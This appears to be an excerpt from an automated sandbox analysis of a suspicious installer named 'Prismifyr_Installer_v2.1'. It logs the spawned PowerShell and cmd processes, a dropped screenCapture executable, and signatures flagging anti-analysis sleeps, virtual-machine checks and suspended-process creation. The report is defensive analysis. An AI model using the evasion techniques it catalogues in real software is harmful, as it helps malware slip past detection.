Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Memory allocated: D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Memory allocated: 1A6F0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3227
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3851
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4274
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 719
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vulkan-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsExec.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\SpiderBanner.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libEGL.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036 Thread sleep count: 3227 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036 Thread sleep count: 3851 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980 Thread sleep count: 4274 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280 Thread sleep count: 719 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe TID: 7132 Thread sleep time: -922337203685477s >= -30000s
Queries keyboard layouts
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059CC
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_004065FD FindFirstFileW,FindClose, 0_2_004065FD
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\locales Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop Jump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: bCK1sK9IRQq9qEmUv4RDsNuESgMjGWdqb8FuvAY5N9GIIvejQjBAMA8GA1UdEwEB/wQFMAMB
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSDKVersion() < 27 && IsAdreno5xxOrOlder(functions)) || (!isMesa && IsMaliT8xxOrOlder(functions)) || (!isMesa && IsMaliG31OrOlder(functions))
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ZAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTest n
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Screen Codec / VMware Video
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Memory allocated: page read and write | page guard
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv" Jump to behavior
